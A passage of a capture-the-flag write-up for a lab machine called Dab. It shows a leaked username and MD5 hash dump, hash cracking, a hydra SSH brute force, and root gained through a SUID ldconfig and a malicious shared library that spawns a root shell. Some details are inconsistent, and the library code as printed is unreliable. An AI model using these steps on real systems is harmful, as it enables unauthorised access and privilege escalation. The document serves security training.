    "rosie": "4e1fc346e7c4ab1a4117e672104c2868",
    "coralie_zieme": "54367234b56d1e840e7be52d08244697",
    "elbert_dooley": "d78c8062386ffd8cfc69c122eb61ca5f",
    "admin": "2ac9cb7dc02b3c0083eb70898e549b63",
    "keaton": "08cbb71c4a2724b9c8d0c5648b80acd6",
    "cleora.breitenberg": "181defb29bbf88668e8c92c4944342e2",
    "kirk.flatley": "2d93560dd57e4a7407639ce806b6f3e2",
    "immanuel_zieme": "89e90a214d3cdd0c7ce8cac78ae892ae",
    "dortha_schroeder": "eb6a24bc790c13f5f2d337d3341b6a53",
    "jackeline": "3f5f1d06ebf561d9c81395899515cd85",
    "magnus_stark": "d1cdc22920628286a631548ab045fbf4",
    "jerrell_huels": "ca9c98e7344ae860610fcf93a4aae1b6",
    "gwen": "b1d06d3ff76a39149901caecb75241b2",
    "lew": "2d62043137f31a3fd83d39f6ba64d0b0",
    "anahi": "e48819f584319fc7825818cb052bf6ca",
    "gerry.wehner": "f3d8cc2c0b7ff6273b0731f147236de0",
    "denis": "32a03378dbb3709c00fe1d91e2962918",
    "alvera.emmerich": "22e5af624d97a9958442d0ac75db1075",
    "tiana": "220607eb9bbf6b2a4f950fbb1e4ae059",
    "sammy": "a8a37c7f172c27043ca799694aeea5b0",
    "keyon": "a3154a1560f1e81af73b30944f4c5e32",
    "nicole": "23f848ba3deff4b595e1e4bc25dbaeb5",
    "ronny_koch": "c3aba5517f098239b4b9b201bd4aaa7f",
    "tatyana_dietrich": "e14fdc75604d2c3a779513ed2aa4ada9",
    "jeramy.jacobs": "ddd250fe435a67417e08681becea604a",
    "marcel_ratke": "41f789d9e284ddcf98a8ae41fc46574a",
    "porter.murazik": "c5aa1c9ed87d1640fad00c81d6b606b9",
    "dallin.marvin": "1d29e1907add5bdc157be32b85844b2a",
    "neoma.nader": "5727cac3cbb8f794a397b08887d7928b",
    "jerrell.dickinson": "b2ab997c50b8b46dfadc584eea737456",
    "destiney_o'reilly": "7686e6e57f4aab28b9c359ad0d86ec97",
    "amani": "1d1f548717379da48997e969a8a64d3a",
    "arjun.ernser": "504859dab10aefaafa0d0c7671e1b16c",
    "dannie.stroman": "14cee124780356003325d96308efbf44",
    "caterina": "41a0e81194b21f3f37223004c13849d9",
    "stuart_gutkowski": "af0cc9fdcc686b01d089549aa0605213",
    "maude_zemlak": "d7f1e37a869b117301dbeb9f086a3fef",
    "mireille_cruickshank": "f3923875bfc6f4aa9a0ff9a521ec936d",
    "isabelle": "c20670ad7cf7664ccede04858d108cdd",
    "sandrine_crist": "2fb83faa50fde4f34460e7a30696fd59",
    "alva": "c0431f9f4faf269c193120cdbd00a21a",
    "doris_donnelly": "03104c8c48333b42c8f83fcda8880e6f",
    "kaitlin": "eb85fe5e49ede1ef9569f163ff3f4470",
    "jean.lemke": "516916298f414abef25f683fa941110e",
    "abdiel": "2c910ddfc4e0132d1d81a1d620600467",
    "abner_stroman": "5935d0e1a496b73537777fcf406dc020",
    "macey": "bafed1c91004a16534b19d681f03d530",
    "devonte": "c1cd9d0cd159ecf73c3a0c404c144211",
    "iva": "0173414ea8139684f04d954ef3c8c1a9",
    "paolo_streich": "c5584a3f8a4127f8267cecbe5a472035",
    "demo": "fe01ce2a7fbac8fafaed7c982a04e229",
    "owen": "8df8c31baf45ef725c33801ada12b5ea",
    "audrey": "9a1ab2202abb2b8e9dc7e2783f75788d",
    "darrell": "ddeac952a6740e05f416de5874c1cd56",
    "mathilde.yundt": "c0aed5cc753584cb09a42f22bc4901af",
    "jeanie_balistreri": "3b5055ec0293d04caebd679b7979da29",
    "dejah_wilderman": "d2642f95ebe20b65169e0f927b2b0999",
    "bella": "4bafc76b4a11f6a1ce1ef988d995262a",
    "vladimir.rogahn": "b9c8ed82f30172bc20c97e2fd8e0cc8f",
    "samson": "029b7aa1acd10b796b196ee3d4097e0d",
    "tristian": "d24be8b2125f6d22d4c5ce43e1e3199d",
    "xavier_jacobson": "2b82a4c1aa7f9c44ed6e3bd1914ac490",
    "evie": "de12f8592ef5395a15b6fd2202197536",
    "dock.kiehn": "5a7e5ec678249f652a3bb81cad0c9f60",
    "vivien": "3454f4d3387a9bd8a08d862b457e486b",
    "gaston.mills": "a6cf224244f758d16713db0b3f0f21fc",
    "mafalda": "0a8403926f54f19f0e46f17b91a2c2ae",
    "arturo": "cae80c57461a1a295f04b4a49ee1293a",
    "tiara_schneider": "10a84f8c91255b419fa881d6f732faf5",
    "conor": "e010250e00ec9d5af6f77e40cda87897",
    "kristy": "575fa3862f7222b9b5385026ef32d688",
    "alfredo": "cd39f9ce29eb4c5bf7ed71a834e4d894",
    "rocio": "c54b17127ad539da05763e88d344cfbf",
    "kavon_jaskolski": "e5940103ff76021050b570d798e5239c",
    "sonya_abbott": "b7d25922e320182c85ea45686f56a775",
    "summer": "ba75add97ea218ceb7dda8e28bb24eab",
    "savannah": "e09006276783fa0feee15a4f51287855",
    "jaquan.sauer": "6f04804d79697dbae3657b5934f26074",
    "jayce.hintz": "99b487460c327c8d5c7ca663219e8b74",
    "margarita_okuneva": "00d06142ce0b5a7243ad2909b5848c59",
    "cary.ondricka": "bfbf852d0872233ba848917ae607575f",
    "lexus": "083e0bd1e7149ee3f759fbf6ae3485f1",
    "logan.white": "a58a994f2ba6a7ffb61f5cb0b89d8523",
    "nick": "1a05c0b6f48562aec32810bc35073661",
    "rose": "61651b6760fb585a3641bc41da8e855c",
    "pat_wilkinson": "e57588e053a34e57c691033732082f58",
    "genevieve": "fc7992e8952a8ff5000cb7856d8586d2",
    "blaise.sauer": "86cab94e4c136f058cc9710e5463268b",
    "abbigail": "9731e89f01c1fb943cf0baa6772d2875",
    "sonia": "16e536ac3d8b71a8458bca4b4a5c02ea",
    "maya": "bcd23bf4b88d707dc8b9779d7be17189",
    "monique": "8b005ce5899bb266c949c49dd4662ec6",
    "eugene_kreiger": "3955cb5285fef4dd8f248ca3b97e933b",
    "ahmed_gibson": "8915af36bc729f449664fd5a0c720c75",
    "clair.cronin": "93ccb8768bf9aacdec74de999e01a5bf",
    "sarina.hodkiewicz": "ee1439dfb65cc43814d8dc59fa90a339",
    "lavonne.schroeder": "fe1a46f519e9af9fa10b9d12f88b96d7",
    "dewayne.steuber": "ffc56ad16ada1bba47a8104956d67d71",
    "fernando": "1f1bcc2c1b44b07e2364f3741a47762e",
    "marques": "8e6f8704b029cae0e26636be1bce50ef",
    "brianne_heathcote": "4b6f19924e076f588844e91aa4caa089",
    "rachael": "32fc152051586ba48c5eb53d1f9bc11a",
    "alexandra": "ce7f915c0b543ed8d4b77a47dd24737c",
    "clementina": "0f5198cbc4b9a98548dbf946eb8c2168",
    "kathryne_kling": "9009e43a2805a6f1d45d3d9c59b3c130",
    "alexandre": "2d4b230e2240053c4d9ebb9613856908",
    "ivah": "2b0535023a614acafb7b7f5fbb91eb3b",
    "xander_schoen": "efbbd15b30cbfe2a206ca1291deca009",
    "shea": "d2736f6b7b47a40b1615af3ae419f6ab",
    "donny": "94e406b569e15565746d0a9592636f56",
    "jimmie": "4950c4c8e41c25a0c4cc913ff3f96ef1",
    "kathlyn": "34b8bce72871d15ced725cc1184f8f4a",
    "cleve_mckenzie": "4ae1a59c3cbaa065adbf26b904fa6781",
    "ashtyn.will": "d249b651702c68a2ed1fcfe2b4d99987",
    "presley.weissnat": "7b5168687749996ab74316a885e2b881",
    "marjolaine": "947c16a51f8e590debf7c9105d64c7df",
    "vivian": "ef0ca75e2d27434d2c4e02ac2c0f0c6e",
    "jennings": "41121d6da3615554ad0e0d01172634ba",
    "merritt_marks": "08ab1f602ea471e4e1a04f3934ec73e9",
    "efrain.hoppe": "31446ccc8161d50e2cecc133e0b11f85",
    "carol": "1f7374359d1456c11497aeaea408f84a",
    "genoveva_carter": "8838d8fd3db319f7a6a67d0ab5e52021",
    "jevon": "9e876fe23bd371b5bf7c07ca3f6d7634",
    "julia_monahan": "4c7fc2df5576ee3b68c5c79a755a0d33",
    "stanton_reynolds": "eed7a216ee2b9026591a29354acd3193",
    "tyrel": "150937304c73b4088c35c574d2f41f03",
    "carolyn": "4e2de8249eaeb94175a3e4824ff66c7c",
    "willow_mayer": "c65ea95f54056088f616601766eaa2db",
    "elenora_hahn": "919cff95c01cf51e2fd9a74db418c4bf",
    "jacinto.yundt": "ff5c237762ac41b30e59bc7b21042ba7",
    "aliyah": "20b4192f696213a8f4c7e5c7f84d60d1",
    "wade": "90346439328d6a4dd28af2b68acd5048",
    "leonel.marquardt": "ed98c3ce8aea0881334fe76de885dfc4",
    "marie": "7905c8fa4ede73a339906006b0e9c7c9",
    "jany": "a0a84994d69b3e738c1ac376df1dcabf",
    "vicky.hansen": "3e92536b0a568ede949bf1589bd16318",
    "arielle.sauer": "4bbe939fc8ac2d9bffc36aed5dacb9b1",
    "angelina.murazik": "aea180b10da81b62ffb6f35c033d99b1",
    "marcelo_brown": "f016e357657692aa181ca3cdfaf7b811",
    "eulah": "d772f9b38c9aa2d457c034d838c1be21",
    "jerrell": "1fe4031155a1412eb41f806740209cb0",
    "robyn_koepp": "edb235d64e26dfe7eecf820aeec20d09",
    "johnathon": "1cc714db88bbf5cd11ce6de641bf9e8d",
    "jacquelyn": "8189067a15ac1a5f5d57b6520b3c5c98",
    "nickolas.muller": "6bdde7ca2ab71fbb063c4d94ba7a0cb0",
    "lilliana_cummings": "c9c4cc2813f63b6da914965e41ba3476",
    "rachelle": "8d783621dfdb8722a80b5b10a45632ee",
    "lauretta": "eb462e1df69951cfb55d2cee556a49cb",
    "cordie.ortiz": "e12fa6b635222f258e1b0729755f3746",
    "rick": "0daa6275280be3cf03f9f9c62f9d26d1",
    "karl_hane": "1707c74ab5a1f96b9561a5b905b4f0f0",
    "gail": "5ae72fc8f3cb837ea4199362d70d7ae7",
    "adelia.berge": "bab4822dc29350a71e1015c916782713",
    "bud": "a994cdb47a8f661d7c091f84d4bd17ce",
    "rahul": "4b6d890ff0ba849d2724ace69db763c3",
    "stanford": "29de69a508e1f96a87898f50a564b9a6",
    "default": "c21f969b5f03d33d43e04f8f136e7682",
    "emie": "f519fdd188bb126dc912227a8163745c",
    "anna.bins": "10a6fffd7be7a218b2bd3507dc175dc5",
    "dane_wyman": "0ba31824ccdb1e133f79ad04f3855e40",
    "arne": "a791bbdf84fd98116c04246573d98e4a",
    "nat.wilkinson": "dcefd200f4856aeda1fc721a544fa717",
    "gerda": "377fc2d8b7c81f91708352491bc5d1e9",
    "roselyn_streich": "e32eebf5d2da2d61f08e5e4dfff04029",
    "d_murphy": "254e5f2c3beb1a3d03f17253c15c07f3",
    "jacynthe.kiehn": "bc8bb4c0f4ce272086b2cf02f6123f1d",
    "kianna_block": "bceee353497d21dad6b745d668d1ba3c",
    "manley": "be362c649da16df9d5a9fa854ddd3a24",
    "chaz": "648a629ea7ac036a9837e72da9f1fac5",
    "joanie_zboncak": "0297dc52c8540050dad5fc82aaa3026b",
    "adolph.kohler": "65b6d8708f1e865ca9378fec74407ce6",
    "dejon": "389bfdf3859555f26c28827583237c57",
    "dorcas": "2a9bed3bb2052c644a7f3130ddc78546",
    "benjamin.pfannerstill": "67b3ded77ab0a3f4eefd37a2ded00f48",
    "onie_kreiger": "0406b1f270012cdafac8fab92fb0ccd5",
    "jaquelin.medhurst": "63d75125cf5db3fe850cf359e0237992",
    "heidi_krajcik": "adf27575ef70c773fed3cd82fa06fa1f",
    "clement_cummerata": "4d71cd239acb3f9a5198159beaa05575",
    "tess": "389e03628382fb010c729319953e4c78",
    "lance": "b713cf03505e7e3b995f45f6df5e9460",
    "ursula.weimann": "e12e607e7bdd2105cc3d68c33c0d905e",
    "maximus_robel": "c3655a791fa65e0a75c849c1d56d66a1",
    "irma": "5177790ad6df0ea98db41b37b602367c",
    "lucie": "01971ddb0d362010a8e484f0630de1e9",
    "devon": "953155467fab407a18cb7c8f576d1ef6",
    "kory": "c40c83a8bd2914202bd22770405b0b4c",
    "keely.reynolds": "8b0b59e115aad4d3deee62b591c80b28",
    "adrianna": "3ceb64d1364a8c92134484029e4f2770",
    "jaylin.langworth": "f3e06518bbfa9d108ad30cf5628e480a",
    "agustin.kreiger": "a434c202f65475988efa9622a77f9594",
    "shaylee_roob": "81dbedf631f0dd59d00403c661972c0a",
    "zelma": "55f0db8276de5dc76d9b858bd0de78a0"
}

This is a very long list with usernames and md5 hashes. Next step would be wise to separate the usernames from the hashes so I can feed them in a brute-force attempt.

root@n0w4n:~/htb/dab# awk -F '"' '{print $2}' output.json > usernames.txt
root@n0w4n:~/htb/dab# awk -F '"' '{print $4}' output.json > hashes.txt

Next I need to find the plain text value of the hashes……especially the one I need to SSH into the box.
Assuming this is the correct line of thought.
For this you can use hashcat and john the ripper, but hashcat is no good when working inside a vm and john can be somewhat slow when dealing with a large list of hashes. Also its output is not desireable. Instead I use a great tool: hash-buster.

root@n0w4n:~/htb/dab# python3 ~/opt/tools/hash-buster/hash.py -f ~/htb/dab/hashes.txt -t 10
_  _ ____ ____ _  _    ___  _  _ ____ ___ ____ ____
|__| |__| [__  |__|    |__] |  | [__   |  |___ |__/
|  | |  | ___] |  |    |__] |__| ___]  |  |___ |  \  v3.0
[!] Hashes found: 495
254e5f2c3beb1a3d03f17253c15c07f3 : hacktheplanet
2ac9cb7dc02b3c0083eb70898e549b63 : Password1
fe01ce2a7fbac8fafaed7c982a04e229 : demo
9731e89f01c1fb943cf0baa6772d2875 : piggy
5177790ad6df0ea98db41b37b602367c : strength
6f9ff93a26a118b460c878dc30e17130 : monkeyman
0daa6275280be3cf03f9f9c62f9d26d1 : lovesucks1
eb95fc1ab8251cf1f8f870e7e4dae54d : megadeth
1e0ad2ec7e8c3cc595a9ec2e3762b117 : blaster
fc7992e8952a8ff5000cb7856d8586d2 : Princess1
0ef9c986fad340989647f0001e3555d4 : misfits
c21f969b5f03d33d43e04f8f136e7682 : default
[!] Results saved in cracked-hashes.txt

This one does the job in a few seconds.
Because I have a short list of cracked passwords, I want to know which user belongs to a hash.
To do this, I write a simple for loop to verify the data and give a list to use with hydra.

root@n0w4n:~/htb/dab# for hashes in $(cat new_hashes.txt); do cat output.json | grep $hashes >> creds.list; done
root@n0w4n:~/htb/dab# cat creds.list
"d_murphy": "254e5f2c3beb1a3d03f17253c15c07f3",
"admin": "2ac9cb7dc02b3c0083eb70898e549b63",
"demo": "fe01ce2a7fbac8fafaed7c982a04e229",
"abbigail": "9731e89f01c1fb943cf0baa6772d2875",
"irma": "5177790ad6df0ea98db41b37b602367c",
"ona": "6f9ff93a26a118b460c878dc30e17130",
"rick": "0daa6275280be3cf03f9f9c62f9d26d1",
"wendell": "eb95fc1ab8251cf1f8f870e7e4dae54d",
"alec": "1e0ad2ec7e8c3cc595a9ec2e3762b117",
"genevieve": "fc7992e8952a8ff5000cb7856d8586d2",
"aglae": "0ef9c986fad340989647f0001e3555d4",
"default": "c21f969b5f03d33d43e04f8f136e7682",

To remove the useless chars and split the creds again:

root@n0w4n:~/htb/dab# sed -i 's/"//g' creds.list
root@n0w4n:~/htb/dab# sed -i 's/ //g' creds.list
root@n0w4n:~/htb/dab# sed -i 's/,//g' creds.list
root@n0w4n:~/htb/dab# cat creds.list
d_murphy:254e5f2c3beb1a3d03f17253c15c07f3
admin:2ac9cb7dc02b3c0083eb70898e549b63
demo:fe01ce2a7fbac8fafaed7c982a04e229
abbigail:9731e89f01c1fb943cf0baa6772d2875
irma:5177790ad6df0ea98db41b37b602367c
ona:6f9ff93a26a118b460c878dc30e17130
rick:0daa6275280be3cf03f9f9c62f9d26d1
wendell:eb95fc1ab8251cf1f8f870e7e4dae54d
alec:1e0ad2ec7e8c3cc595a9ec2e3762b117
genevieve:fc7992e8952a8ff5000cb7856d8586d2
aglae:0ef9c986fad340989647f0001e3555d4
default:c21f969b5f03d33d43e04f8f136e7682

root@n0w4n:~/htb/dab# awk -F ":" '{print $1}' creds.list > new_usernames.txt
root@n0w4n:~/htb/dab# awk -F ":" '{print $2}' cracked-hashes.txt > new_passwords.txt

And run hydra.

root@n0w4n:~/htb/dab# hydra -L new_usernames.txt -P new_passwords.txt 10.10.10.86 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-30 11:12:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 144 login tries (l:12/p:12), ~9 tries per task
[DATA] attacking ssh://10.10.10.86:22/
[22][ssh] host: 10.10.10.86   login: genevieve   password: Princess1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-30 11:13:26

I could have run hydra without the hassle of filtering the found creds, but that only took a few minutes while hydra would have run a very long time to try all usernames and all passwords.

root@n0w4n:~/htb/dab# ssh genevieve@10.10.10.86
genevieve@10.10.10.86's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
genevieve@dab:~$

genevieve@dab:~$ ls -lah
total 28K
drwxr-xr-x 3 genevieve genevieve 4.0K Aug 15 06:23 .
drwxr-xr-x 3 root      root      4.0K Mar 19  2018 ..
lrwxrwxrwx 1 root      root         9 Aug 15 06:22 .bash_history -> /dev/null
-rw-r--r-- 1 genevieve genevieve  220 Mar 19  2018 .bash_logout
-rw-r--r-- 1 genevieve genevieve 3.8K Mar 25  2018 .bashrc
drwx------ 2 genevieve genevieve 4.0K Mar 19  2018 .cache
-rw-r--r-- 1 genevieve genevieve  655 Mar 19  2018 .profile
-r-------- 1 genevieve genevieve   33 Mar 19  2018 user.txt
genevieve@dab:~$ cat user.txt
[no spoilers]

And here is the first hash.
Now for root.
I can enumerate by hand, but there is a script that can take the load out of my hands. The only catch is that it gives a lot of output. So don’t get overwhelmed.

root@n0w4n:~/htb/dab# scp linenum.sh genevieve@10.10.10.86:/home/genevieve
genevieve@10.10.10.86's password:
linenum.sh                                                            100%   46KB 290.4KB/s   00:00

There I ran the script and pushed the report back to my machine for save keepings.

genevieve@dab:~/.cache$ sudo -l
[sudo] password for genevieve:
Matching Defaults entries for genevieve on dab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User genevieve may run the following commands on dab:
    (root) /usr/bin/try_harder

A legit clue or a way down the rabbit whole?

genevieve@dab:~/.cache$ /usr/bin/try_harder
root@dab:~# id
Segmentation fault
That would have been too easy! Try something else.

Hahahahahahaha………yeah, that would be too easy.
After some searching through the report there were 3 files that caught my eye.

/usr/bin/myexec
/sbin/ldconfig

These files have the SUID bit set. /usr/bin/myexec I didn’t know and came up zero with google.
And the other one normally doesn’t have the SUID bit set: -rwxr-xr-x 1 root root 884K Oct 29 21:36 /sbin/ldconfig
When running msexec I need to feed it a password, but my current one doesn’t suffice.

genevieve@dab:~$ /usr/bin/myexec
Enter password: Princess1
Invalid password

First I try ltrace to see if the hardcoded password will apear.
Ltrace is a debugging utility in Linux, used to display the calls a userspace application makes to shared libraries.

genevieve@dab:~$ ltrace /usr/bin/myexec
__libc_start_main(0x400836, 1, 0x7ffc8d40d4f8, 0x4008f0 <unfinished ...>
printf("Enter password: ")                                                                                                        = 16
__isoc99_scanf(0x400985, 0x7ffc8d40d3c0, 0x7fa2221e3780, 16Enter password: test
)                                                                      = 1
strcmp("s3cur3l0g1n", "test")                                                                                                     = -1
puts("Invalid password\n"Invalid password
)                                                                                                        = 18
+++ exited (status 1) +++

There it is. Now to run the binary again.

genevieve@dab:~$ /usr/bin/myexec
Enter password: s3cur3l0g1n
Password is correct
seclogin() called
TODO: Placeholder for now, function not implemented yet

It stops at this point and I need to check the binary more to see if there is more to gain.
With objdump -x myexec I can get information from object files.

Dynamic Section:
  NEEDED               libseclogin.so
  NEEDED               libc.so.6

This is a part of the output which shows its dependencies. libc is standard c library. libseclogin.so is the one I focus on.

genevieve@dab:~$ ldd /usr/bin/myexec
	linux-vdso.so.1 =>  (0x00007fff7f57b000)
	libseclogin.so => /usr/lib/libseclogin.so (0x00007fee9be40000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fee9ba76000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fee9c042000)

Because the SUID bit is set on /usr/sbin/ldconfig I can run ldconfig as root and link libraries local.
In this case I want to create my own version of libseclogin.so and get a root shell.
So I create a libseclogin.c with the following code:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
 setuid(0); setgid(0); system("/bin/bash");
}

And compile it as libseclogin.so and make it executable.

genevieve@dab:~$ gcc -o /tmp/libseclogin.so /tmp/libseclogin.c
genevieve@dab:~$ chmod +x libseclogin.so

I use ldconfig to link the folder where my newfound libseclogin.so library is waiting

genevieve@dab:~$ ldconfig -l /tmp/libseclogin.so

Next I set the variable LD_LIBRARY_PATH

genevieve@dab:~$ LD_LIBRARY_PATH=/tmp LD_PRELOAD=/tmp/libseclogin.so

And finally I run myexec again………..and nothing…..no shell…nada.
What went wrong?
After some more reading I found a page which gave som good pointers about changing the location off libraries.

genevieve@dab:~$ echo "/home/genevieve/" > /etc/ld.so.conf.d/local.conf
genevieve@dab:~$ ldconfig
genevieve@dab:~$ ldconfig -l /home/genevieve/libseclogin.so

When checking the dependecies of myexec again I see that this time it has changed.

genevieve@dab:~$ ldd /usr/bin/myexec
	linux-vdso.so.1 =>  (0x00007fff90993000)
	libseclogin.so => /home/genevieve/libseclogin.so (0x00007f78103a0000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f780ffd6000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f78105a2000)

And finally when running myexec again……it works.

genevieve@dab:~$ /usr/bin/myexec
Enter password: s3cur3l0g1n
Password is correct
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root),1000(genevieve)
sh-4.3# cd /root
sh-4.3# ls
root.txt
sh-4.3# cat root.txt
[no spoilers]

There is the final hash.
Man…..this was a good challenge. I definitely needed to read a lot for this one.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.